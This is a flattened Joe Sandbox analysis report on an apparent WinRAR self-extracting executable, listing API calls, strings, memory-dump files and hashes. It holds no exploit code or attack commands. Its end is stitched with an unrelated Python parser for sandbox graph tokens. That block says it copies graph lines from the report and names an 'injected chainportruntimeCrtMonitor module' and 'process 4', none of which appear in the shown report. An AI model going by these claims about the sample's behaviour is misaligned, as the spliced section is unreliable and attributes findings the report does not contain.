• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: _wcslen
• String ID: }
• API String ID: 176396367-4239843852
• Opcode ID: 755c5b04633cb2d3d21edb24b4931b4d5ebaa53f5ee4e512fe9adcc5ec2ad056
• Instruction ID: 9a2e18648f3c53c1482556f1ac461310d162128a92deda786de147d8e1f3fc7c
• Opcode Fuzzy Hash: 755c5b04633cb2d3d21edb24b4931b4d5ebaa53f5ee4e512fe9adcc5ec2ad056
• Instruction Fuzzy Hash: 102105729043065AD731EEB4F845E6BF3EDDF90758F00282AF940E3141EB68ED4883A2
APIs
  • Part of subcall function 00E3F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E3F2E4
  • Part of subcall function 00E3F2C5: GetProcAddress.KERNEL32(00E781C8,CryptUnprotectMemory), ref: 00E3F2F4
• GetCurrentProcessId.KERNEL32(?,?,?,00E3F33E), ref: 00E3F3D2
Strings
• CryptProtectMemory failed, xrefs: 00E3F389
• CryptUnprotectMemory failed, xrefs: 00E3F3CA
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
• API String ID: 2190909847-396321323
• Opcode ID: a5fa1ec069726148a14f18c373ba7c5b59ec008a79d779f3d44ef7b71da66100
• Instruction ID: cf0937979154321a858b015e4f6976f9465c504f52f3ac1ab3419a6a65057c01
• Opcode Fuzzy Hash: a5fa1ec069726148a14f18c373ba7c5b59ec008a79d779f3d44ef7b71da66100
• Instruction Fuzzy Hash: 2E113331E01228AFDF11AB31EC4EA6E3F94EF00764F00A126FC457B261CA749D45C690
APIs
• CreateThread.KERNEL32(00000000,00010000,00E41160,?,00000000,00000000), ref: 00E41043
• SetThreadPriority.KERNEL32(?,00000000), ref: 00E4108A
  • Part of subcall function 00E36C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E36C54
  • Part of subcall function 00E36DCB: _wcschr.LIBVCRUNTIME ref: 00E36E0A
  • Part of subcall function 00E36DCB: _wcschr.LIBVCRUNTIME ref: 00E36E19
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
• String ID: CreateThread failed
• API String ID: 2706921342-3849766595
• Opcode ID: f76db95ad75faeeca9dceb22ce2df6f650cbc4927918c8ae927295c2ac7efbfc
• Instruction ID: b5ee98baea701050b29e9d53ca8fdf2d51408759867e10bf630c232e1446a09c
• Opcode Fuzzy Hash: f76db95ad75faeeca9dceb22ce2df6f650cbc4927918c8ae927295c2ac7efbfc
• Instruction Fuzzy Hash: 7401FEB53443097FD730AF74BC56B76B798EB40751F20606DF54672280CAE16CC88624
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: _wcschr
• String ID: <9$?*<>|"
• API String ID: 2691759472-2723886458
• Opcode ID: 6e2646f6dd82e79a7097df198eae23ccd6ae727951415dd2fa98aefadbdfaff1
• Instruction ID: daadc4c703071d2528576d69ea48b59bdbc4beddfe0fe51976749246379a34d5
• Opcode Fuzzy Hash: 6e2646f6dd82e79a7097df198eae23ccd6ae727951415dd2fa98aefadbdfaff1
• Instruction Fuzzy Hash: 75F0D617944381C1C7381A286815732B7E4DF91324F34281EE5C4B71D2E5A1C8C0CB55
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: Software\WinRAR SFX$
                                                                                                                    • API String ID: 176396367-3959033184
                                                                                                                    • Opcode ID: 65d801ccd3802994aa7859b0da4c706bb3d35b1120ba7200af4f7e6670bd8f66
                                                                                                                    • Instruction ID: baac163849a6668a7c2068b5d492fab4c71b8746df54ba26dd07adb4e8935430
                                                                                                                    • Opcode Fuzzy Hash: 65d801ccd3802994aa7859b0da4c706bb3d35b1120ba7200af4f7e6670bd8f66
                                                                                                                    • Instruction Fuzzy Hash: 43018471500218BEDB219BA1EC0AFDF7FBCEB45794F004052B509B1061D7B14A88C7A1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E3C29A: _wcslen.LIBCMT ref: 00E3C2A2
                                                                                                                      • Part of subcall function 00E41FDD: _wcslen.LIBCMT ref: 00E41FE5
                                                                                                                      • Part of subcall function 00E41FDD: _wcslen.LIBCMT ref: 00E41FF6
                                                                                                                      • Part of subcall function 00E41FDD: _wcslen.LIBCMT ref: 00E42006
                                                                                                                      • Part of subcall function 00E41FDD: _wcslen.LIBCMT ref: 00E42014
                                                                                                                      • Part of subcall function 00E41FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E3B371,?,?,00000000,?,?,?), ref: 00E4202F
                                                                                                                      • Part of subcall function 00E4AC04: SetCurrentDirectoryW.KERNELBASE(?,00E4AE72,C:\Users\user\Desktop,00000000,00E7946A,00000006), ref: 00E4AC08
                                                                                                                    • _wcslen.LIBCMT ref: 00E4AE8B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                                                    • String ID: <$C:\Users\user\Desktop
                                                                                                                    • API String ID: 521417927-1688363908
                                                                                                                    • Opcode ID: 95728644c60b733c0310e3b3f75d9b79fbf218e9cda10a40e44df59210b85f50
                                                                                                                    • Instruction ID: 4c8b86cb5aade2229dd72843c32f1750afc1b94a5a65b832ea1c2ee69ba047a2
                                                                                                                    • Opcode Fuzzy Hash: 95728644c60b733c0310e3b3f75d9b79fbf218e9cda10a40e44df59210b85f50
                                                                                                                    • Instruction Fuzzy Hash: 91017571D4021899DF10ABA4ED4ADDF73FCAF08704F041466F616F3192E6B4A6888BA1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E597E5: GetLastError.KERNEL32(?,00E71030,00E54674,00E71030,?,?,00E53F73,00000050,?,00E71030,00000200), ref: 00E597E9
                                                                                                                      • Part of subcall function 00E597E5: _free.LIBCMT ref: 00E5981C
                                                                                                                      • Part of subcall function 00E597E5: SetLastError.KERNEL32(00000000,?,00E71030,00000200), ref: 00E5985D
                                                                                                                      • Part of subcall function 00E597E5: _abort.LIBCMT ref: 00E59863
                                                                                                                    • _abort.LIBCMT ref: 00E5BB80
                                                                                                                    • _free.LIBCMT ref: 00E5BBB4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast_abort_free
                                                                                                                    • String ID: p
                                                                                                                    • API String ID: 289325740-2678736219
                                                                                                                    • Opcode ID: 5562ea3493d4f28d60c4b7b39dd246318d02ea71b09e0657310a7ad5c9374db7
                                                                                                                    • Instruction ID: 70f079af9fd9037554092ec565b422f53d8058afb46d4f31f9b70007a4a749e2
                                                                                                                    • Opcode Fuzzy Hash: 5562ea3493d4f28d60c4b7b39dd246318d02ea71b09e0657310a7ad5c9374db7
                                                                                                                    • Instruction Fuzzy Hash: 8701C475D00621DFCB61AF69A40126EB7F0BF04B26B15290AED2477291DBB56D098FC1
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Malloc
                                                                                                                    • String ID: ($Z
                                                                                                                    • API String ID: 2696272793-3316338816
                                                                                                                    • Opcode ID: 5d66b47422e09ff9e948c70e29f5ec0fb77d63a4eee190057fe6f570081cce4e
                                                                                                                    • Instruction ID: 128e945323a7b9d09e251fd75cd423757d810f5d5a6d1132235abe2408c4f763
                                                                                                                    • Opcode Fuzzy Hash: 5d66b47422e09ff9e948c70e29f5ec0fb77d63a4eee190057fe6f570081cce4e
                                                                                                                    • Instruction Fuzzy Hash: A301F6B6640119FF9F059FB1ED49CEEBBADEF08344710415AB906E7120E671AA48DBA0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E5BF30: GetEnvironmentStringsW.KERNEL32 ref: 00E5BF39
                                                                                                                      • Part of subcall function 00E5BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E5BF5C
                                                                                                                      • Part of subcall function 00E5BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E5BF82
                                                                                                                      • Part of subcall function 00E5BF30: _free.LIBCMT ref: 00E5BF95
                                                                                                                      • Part of subcall function 00E5BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E5BFA4
                                                                                                                    • _free.LIBCMT ref: 00E582AE
                                                                                                                    • _free.LIBCMT ref: 00E582B5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                    • String ID: 0"
                                                                                                                    • API String ID: 400815659-420201205
                                                                                                                    • Opcode ID: a0ceee81e26260402f03d6f36c06aaf3129281ef4098e1cd0adef63430af7e07
                                                                                                                    • Instruction ID: bb63c2bda3117249233be4881020035ddb5514654d77d5ebc02ed5285e6e5197
                                                                                                                    • Opcode Fuzzy Hash: a0ceee81e26260402f03d6f36c06aaf3129281ef4098e1cd0adef63430af7e07
                                                                                                                    • Instruction Fuzzy Hash: 34E0E537706942559A61337A2D0266F1A844BC133BF143E1AFF10B60E3CE50880E49A2
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00E41206,?), ref: 00E40FEA
                                                                                                                    • GetLastError.KERNEL32(?), ref: 00E40FF6
                                                                                                                      • Part of subcall function 00E36C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E36C54
                                                                                                                    Strings
                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00E40FFF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                    • Opcode ID: e9306b72f9101311f2ad174c43e221fc29c7e098e6b23b3b78efc8bd04e1ffca
                                                                                                                    • Instruction ID: 0f148e6c7db27ddac9ea476abdc47cbd818652f711ec926bf27766e5e470c3fb
                                                                                                                    • Opcode Fuzzy Hash: e9306b72f9101311f2ad174c43e221fc29c7e098e6b23b3b78efc8bd04e1ffca
                                                                                                                    • Instruction Fuzzy Hash: 55D02EB25482203ACA103338BC0AC6F7C048B22371F20A704F038702F2CB2909898292
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00E3DA55,?), ref: 00E3E2A3
                                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00E3DA55,?), ref: 00E3E2B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindHandleModuleResource
                                                                                                                    • String ID: RTL
                                                                                                                    • API String ID: 3537982541-834975271
                                                                                                                    • Opcode ID: 945aec084093f938eee458596a241135885f125c120ac883fd51311455547335
                                                                                                                    • Instruction ID: 64e97dbe78bd5eb4a01b1be230f94d49838a145965bfa11408b43660356ea210
                                                                                                                    • Opcode Fuzzy Hash: 945aec084093f938eee458596a241135885f125c120ac883fd51311455547335
                                                                                                                    • Instruction Fuzzy Hash: FBC012312407106AEA7017B57C0DB436E5C5B00BA5F051448F141F96D1D6F5C548C6A0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E467
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: p$z
                                                                                                                    • API String ID: 1269201914-1258701225
                                                                                                                    • Opcode ID: cfd6c34d3d97bdcf9f958a95396a2474154855065afb98f314211cc1cbabf94b
                                                                                                                    • Instruction ID: 1b9fbb44aacdeb782cf290b07b36f25c741f2f9b4392ab3cd539a5365c7d8cd5
                                                                                                                    • Opcode Fuzzy Hash: cfd6c34d3d97bdcf9f958a95396a2474154855065afb98f314211cc1cbabf94b
                                                                                                                    • Instruction Fuzzy Hash: 20B012C5299140BC3508A1247C03C3B024CD0C4F90330B02EFD15F0281D8408C000632
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E467
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: U$z
                                                                                                                    • API String ID: 1269201914-4031037884
                                                                                                                    • Opcode ID: cda7a24327c1bf32133267182cfe476a14182edea4556c19aac2f24211fd7c67
                                                                                                                    • Instruction ID: efe193d134951006e374f7d08cd2112cfd8675cda7fbdbf7978f205bccaece39
                                                                                                                    • Opcode Fuzzy Hash: cda7a24327c1bf32133267182cfe476a14182edea4556c19aac2f24211fd7c67
                                                                                                                    • Instruction Fuzzy Hash: E4B012D12981007C350821207D07C3B030CD0C0F50330F02EF711F0281E8444E010532

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:2.6%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:12
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                     Execution graph chains (node id, address, API called):
                                                                                                                     • 14184 7ffd9b93e7fd -> 14185 7ffd9b93e80b SuspendThread -> 14187 7ffd9b93e8e4
                                                                                                                     • 14188 7ffd9b940008 -> 14189 7ffd9b94000a ResumeThread -> 14191 7ffd9b940114
                                                                                                                     • 14192 7ffd9b941e85 -> 14193 7ffd9b941ed2 GetFileAttributesW -> 14195 7ffd9b941f65
                                                                                                                     • 14196 7ffd9b940169 -> 14197 7ffd9b940177 CloseHandle -> 14199 7ffd9b940254
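Once the rendered SVG is gone, the report's execution and control-flow graphs survive only as flat token strings of the form `<id> <address> [API] <src>-><dst>`. The following is an added example, not part of this Joe Sandbox report and not Joe Sandbox's own tooling, that parses that token form back into nodes and edges and extracts the API-call sequence of each chain (for the injected chainportruntimeCrtMonitor module above: SuspendThread, ResumeThread, GetFileAttributesW, CloseHandle). The two sample lines are copied verbatim from this report; the `Node`/`Graph` types and the function names are this example's own, and the grammar it assumes is only what is observable in those lines.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Added example: parser for the flattened execution_graph / control_flow_graph
# token strings in this report. Not Joe Sandbox code; names below are our own.

# Copied from the report's "Execution Graph" section (process 4, chainportruntimeCrtMonitor).
EXECUTION_GRAPH_LINE = (
    "execution_graph 14184 7ffd9b93e7fd 14185 7ffd9b93e80b SuspendThread 14184->14185 "
    "14187 7ffd9b93e8e4 14185->14187 14188 7ffd9b940008 14189 7ffd9b94000a ResumeThread "
    "14188->14189 14191 7ffd9b940114 14189->14191 14192 7ffd9b941e85 14193 7ffd9b941ed2 "
    "GetFileAttributesW 14192->14193 14195 7ffd9b941f65 14193->14195 14196 7ffd9b940169 "
    "14197 7ffd9b940177 CloseHandle 14196->14197 14199 7ffd9b940254 14197->14199"
)

# Copied from one of the report's control-flow graphs for the same module.
CFG_LINE = (
    "control_flow_graph 265 7ffd9b93cd6d-7ffd9b93ce08 "
    "268 7ffd9b93ce0d-7ffd9b93ce45 call 7ffd9b93ce46 265->268"
)

# A node address is a single hex address or a "start-end" basic-block range.
HEX_ADDR = re.compile(r"^[0-9A-Fa-f]{6,}(?:-[0-9A-Fa-f]{6,})?$")


@dataclass
class Node:
    node_id: int
    address: str
    labels: list[str] = field(default_factory=list)  # API names or "call <addr>"


@dataclass
class Graph:
    name: str
    nodes: dict[int, Node] = field(default_factory=dict)
    edges: list[tuple[int, int]] = field(default_factory=list)


def parse_graph(line: str) -> Graph:
    """Rebuild nodes and edges from the whitespace-separated token form.

    Grammar as observed in the report: <name>, then any mix of
    "<id> <addr>" (new node), "<label>" (attached to the last node) and
    "<src>-><dst>" (edge). A "call <addr>" label is kept as one string.
    """
    tokens = line.split()
    graph = Graph(name=tokens[0])
    current: Node | None = None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if "->" in tok:
            src, dst = tok.split("->", 1)
            graph.edges.append((int(src), int(dst)))
            i += 1
        elif tok.isdigit() and nxt is not None and HEX_ADDR.match(nxt):
            current = Node(int(tok), nxt.lower())
            graph.nodes[current.node_id] = current
            i += 2
        elif current is None:
            raise ValueError(f"label {tok!r} appears before any node")
        elif tok == "call" and nxt is not None and HEX_ADDR.match(nxt):
            current.labels.append(f"call {nxt.lower()}")
            i += 2
        else:
            current.labels.append(tok)
            i += 1
    return graph


def api_calls(graph: Graph) -> list[tuple[int, str, str]]:
    """(node id, address, API name) for every API label, in node-id order."""
    return [
        (nid, node.address, label)
        for nid, node in sorted(graph.nodes.items())
        for label in node.labels
        if not label.startswith("call ")
    ]


def roots(graph: Graph) -> list[int]:
    """Nodes with no incoming edge: where each chain or function starts."""
    targets = {dst for _, dst in graph.edges}
    return sorted(nid for nid in graph.nodes if nid not in targets)


def api_sequence_from(graph: Graph, root: int) -> list[str]:
    """API names reachable from `root`, depth-first in the edge order the
    report lists; back-edges (loops such as 177->168 in a CFG) are cut."""
    order: list[str] = []
    seen: set[int] = set()

    def visit(nid: int) -> None:
        if nid in seen or nid not in graph.nodes:
            return
        seen.add(nid)
        order.extend(l for l in graph.nodes[nid].labels if not l.startswith("call "))
        for src, dst in graph.edges:
            if src == nid:
                visit(dst)

    visit(root)
    return order


if __name__ == "__main__":
    g = parse_graph(EXECUTION_GRAPH_LINE)
    print(g.name, "nodes:", len(g.nodes), "edges:", len(g.edges))
    for root in roots(g):
        print(root, "->", api_sequence_from(g, root))
```

The same parser handles the control-flow graph lines further down, whose nodes carry basic-block ranges and `call <addr>` labels instead of API names; the node count it recovers from the execution graph line (12) matches the report's "Total number of Nodes" figure, which is a cheap sanity check when applying it to other reports.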

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
